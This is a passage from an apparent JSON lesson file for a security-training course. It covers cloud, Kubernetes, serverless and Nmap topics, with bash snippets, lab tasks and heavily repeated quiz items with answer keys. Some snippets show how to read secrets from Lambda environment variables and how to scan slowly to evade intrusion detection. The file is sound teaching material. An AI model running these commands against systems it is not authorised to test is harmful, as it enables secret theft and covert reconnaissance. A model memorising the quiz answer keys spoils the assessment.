images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-terraform","cat":"Cloud & Container","title":"Terraform Security Basics","diff":1,"xp":100,"intro":"Infrastructure as Code security fundamentals.","sections":[{"type":"text","content":"Scan Terraform for: public resources, missing encryption, overpermissioned IAM, disabled logging, and open security groups."},{"type":"code","lang":"bash","content":"tfsec .\ncheckov -d .\n# Common issues:\n# aws_s3_bucket without encryption\n# aws_security_group with 0.0.0.0/0\n# aws_rds without encryption\n# No CloudTrail enabled"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deployment","Before deployment (shift-left)","During runtime","In backups"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-k8s-audit","cat":"Cloud & Container","title":"Kubernetes Security Audit","diff":3,"xp":200,"intro":"Audit a K8s cluster for security misconfigurations.","sections":[{"type":"text","content":"Check: RBAC overpermissions, exposed dashboard, default service accounts, missing network policies, secrets in plain text, privileged pods."},{"type":"code","lang":"bash","content":"# RBAC audit\nkubectl auth can-i --list --as=system:serviceaccount:default:default\n# Find privileged pods\nkubectl get pods -A -o json | jq '.items[] | select(.spec.containers[].securityContext.privileged==true)'\n# Check for exposed dashboard\nkubectl get svc -A | grep dashboard\n# Audit with kube-bench\nkube-bench run --targets=master,node"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"The most common K8s security issue is...","opts":["Network speed","Overpermissioned RBAC and privileged pods","DNS resolution","Storage limits"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cloud-pentesting-legal","cat":"Cloud & Container","title":"Cloud Pentesting Legal Considerations","diff":1,"xp":50,"intro":"Each cloud provider has different rules for penetration testing.","sections":[{"type":"text","content":"AWS allows pentesting without notification for most services. Azure requires notification for some. GCP has specific terms. Always check the provider's pentesting policy."},{"type":"code","lang":"bash","content":"# AWS: pentesting allowed for most services\n# - EC2, RDS, Lambda, API Gateway, etc.\n# - NOT allowed: DDoS, zone walking, port flooding\n# Azure: notification NOT required for most\n# GCP: must comply with Acceptable Use Policy\n# ALWAYS: get written authorization from the account owner"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Cloud pentesting rules vary by...","opts":["Time of day","Provider \u2014 each has different allowed/prohibited activities","Pricing tier","Region"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-cloud-forensics","cat":"Cloud & Container","title":"Cloud Forensic Investigation","diff":4,"xp":250,"intro":"Investigate incidents in cloud environments.","sections":[{"type":"text","content":"Cloud forensics uses: CloudTrail logs, VPC Flow Logs, instance snapshots, S3 access logs, and IAM credential reports instead of traditional disk/memory forensics."},{"type":"code","lang":"bash","content":"# AWS investigation\naws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin\n# Snapshot compromised instance\naws ec2 create-snapshot --volume-id vol-xxx\n# Check for unauthorized IAM activity\naws iam generate-credential-report\naws iam get-credential-report | jq '.Content' | base64 -d"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Cloud forensics replaces disk imaging with...","opts":["Nothing","API logs, snapshots, and flow logs","Memory dumps only","Network captures only"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-serverless-attacks","cat":"Cloud & Container","title":"Serverless Attack Techniques","diff":3,"xp":200,"intro":"Exploit AWS Lambda, Azure Functions, and GCP Cloud Functions.","sections":[{"type":"text","content":"Serverless attacks: event injection (SQLi through API Gateway events), environment variable secrets, overprivileged function roles, and dependency confusion."},{"type":"code","lang":"bash","content":"# Check Lambda environment variables (leak secrets)\naws lambda get-function-configuration --function-name func | jq '.Environment'\n# Check function's IAM role\naws iam list-attached-role-policies --role-name lambda-role\n# Event injection: if Lambda processes request.body without sanitization\n# Same injection techniques apply (SQLi, command injection)"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Serverless functions commonly leak secrets in...","opts":["Log files","Environment variables","S3 buckets","DynamoDB"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-network-policies","cat":"Cloud & Container","title":"Cloud Network Security Groups","diff":1,"xp":100,"intro":"Control traffic flow with security groups and NACLs.","sections":[{"type":"text","content":"Security groups are virtual firewalls: define allowed inbound/outbound traffic by port, protocol, and source. 0.0.0.0/0 on SSH = publicly accessible."},{"type":"code","lang":"bash","content":"# Check security groups for open access\naws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`]]]'\n# Audit: any SG with 0.0.0.0/0 on SSH (22), RDP (3389), or databases is a finding"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"0.0.0.0/0 in a security group means...","opts":["Blocked","Open to the entire internet","Internal only","VPN only"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"r-nmap-timing","cat":"Reconnaissance","title":"Nmap Timing Templates","diff":1,"xp":50,"intro":"Control scan speed with -T0 through -T5.","sections":[{"type":"text","content":"Nmap timing templates balance speed and stealth. T0 (paranoid) sends one probe every 5 minutes. T3 is the default. T4 is aggressive. T5 is insane speed but unreliable."},{"type":"code","lang":"bash","content":"nmap -T0 target  # paranoid (IDS evasion)\nnmap -T1 target  # sneaky\nnmap -T3 target  # default\nnmap -T4 target  # aggressive\nnmap -T5 target  # insane (may miss ports)"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"T0 timing is used for...","opts":["Speed","IDS evasion (very slow, stealthy)","UDP scanning","Service detection"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-nmap-output","cat":"Reconnaissance","title":"Nmap Output Formats","diff":1,"xp":50,"intro":"Save scan results in different formats for analysis.","sections":[{"type":"text","content":"Nmap outputs: -oN (normal text), -oX (XML for tools), -oG (greppable), -oA (all three). XML integrates with Metasploit and other tools."},{"type":"code","lang":"bash","content":"nmap -oN scan.txt target\nnmap -oX scan.xml target\nnmap -oG scan.grep target\nnmap -oA scan_all target  # all three at once"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry 